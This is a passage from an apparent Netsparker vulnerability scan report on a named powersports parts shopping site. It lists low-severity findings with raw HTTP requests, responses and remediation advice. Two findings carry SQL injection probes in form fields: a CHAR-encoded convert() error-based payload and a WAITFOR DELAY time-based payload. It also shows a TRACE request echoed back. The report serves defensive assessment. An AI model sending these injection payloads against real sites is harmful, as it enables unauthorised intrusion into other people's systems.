  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

/xtremepowersports/shoppingcart/CheckOut/Navigation.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11

Identified Cookie

ASPSESSIONIDQCSQTSDS

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Content-Length: 7841
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=ILJKBIKAIOMMGIKBKLMAOPIL; path=/
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript"></script>
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="155" border="0" Class=Size8>
<tr align="center" valign="top">
<td>
<!-- SiteSeal Html Builder Code:
Shows the logo at URL
https://seal.networksolutions.com/images/basicsqgreen.gif
Logo type is ("NETSB")
//-->
<script language="JavaScript" type="text/javascript">
SiteSeal("https://seal.networksolutions.com/images/basicsqgreen.gif",
"NETSB ", "none");</script><br><br>
<a href="../CustInfo/ProcessInfo.asp?Type=30" target="Main">Log In</a><br>
<a href="../CustInfo/ProcessInfo.asp?Type=30" target="Main">View Order History</a><br>
<a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/partsfinder.htm" target="_top">OEM Parts Finder</a>
<br>
</td>
</tr>
</table>
<hr>

<table Class=Size8>
<tr align="center" valign="top">
<td>&nbsp;</td>
</tr>
</table>
<hr>

<table border="0" Class=Size8>
<tr>
<td colspan="2"><a name="PartsFinder"></a><font color="#0000CC"><b>Original Factory Parts</b></font></td>
</tr>
</Table>
<table border="0" Class=Size8>
<tr>
<td colspan="2"><font color="#0000CC"><b>Can-am</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Canam_OEM/Canam.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Canam_OEM/canammc.asp" target="_top">Street Bike
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Honda</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaSC.asp" target="_top">Scooters Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>KTM</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/KTM_OEM/KTMATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/KTM_OEM/KTMDB.asp" target="_top">Dirt Bike
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Sea Doo</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Seadoo_OEM/Seadoo_PWC.asp" target="_top">PWC
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Seadoo_OEM/Seadoo_JB.asp" target="_top">Jet
Boat Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Ski Doo</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Skidoo_OEM/Skidoo.asp" target="_top">Snowmobile
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Suzuki</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiSC.asp" target="_top">Scooter
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Yamaha</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11" height="21">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaUTIL.asp" target="_top">Utility
Vehicles</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaPWC.asp" target="_top">PWC
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaJB.asp" target="_top">Jet
Boat Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaSC.asp" target="_top">Scooter
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaSnow.asp" target="_top">Snowmobile
Models</a></td>
</tr>
</table>
<hr>
</body>
</html>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 422
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:33:25 GMT
Content-Length: 1339
Content-Type: text/html
Expires: Mon, 02 May 2011 03:33:26 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Undefined function 'convert' in expression. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST WAITFOR DELAY '0:0:25'--
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Identified Error Message

Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a0046'</font>

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 324
Accept-Encoding: gzip, deflate

cmbAdvert=WAITFOR%20DELAY%20%270:0:25%27--&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:20:06 GMT
Content-Length: 1309
Content-Type: text/html
Expires: Mon, 02 May 2011 03:20:06 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a0046'</font><p><font face="Arial" size=2>Permission denied</font><p><font face="Arial" size=2>/ASPErrors/Main.asp</font><font face="Arial" size=2>, line 46</font>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

/xtremepowersports/shoppingcart/CheckOut/Navigation.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11

Request

TRACE /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Content-Type: message/http
Content-Length: 259


TRACE /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate

Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /xtremepowersports/shoppingcart/

/xtremepowersports/shoppingcart/ CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/

Request

GET /xtremepowersports/shoppingcart/ HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 172


<html><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /xtremepowersports/shoppingcart/

/xtremepowersports/shoppingcart/

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/

Extracted Version

Microsoft-IIS/5.0

Request

GET /xtremepowersports/shoppingcart/ HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 172


<html><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>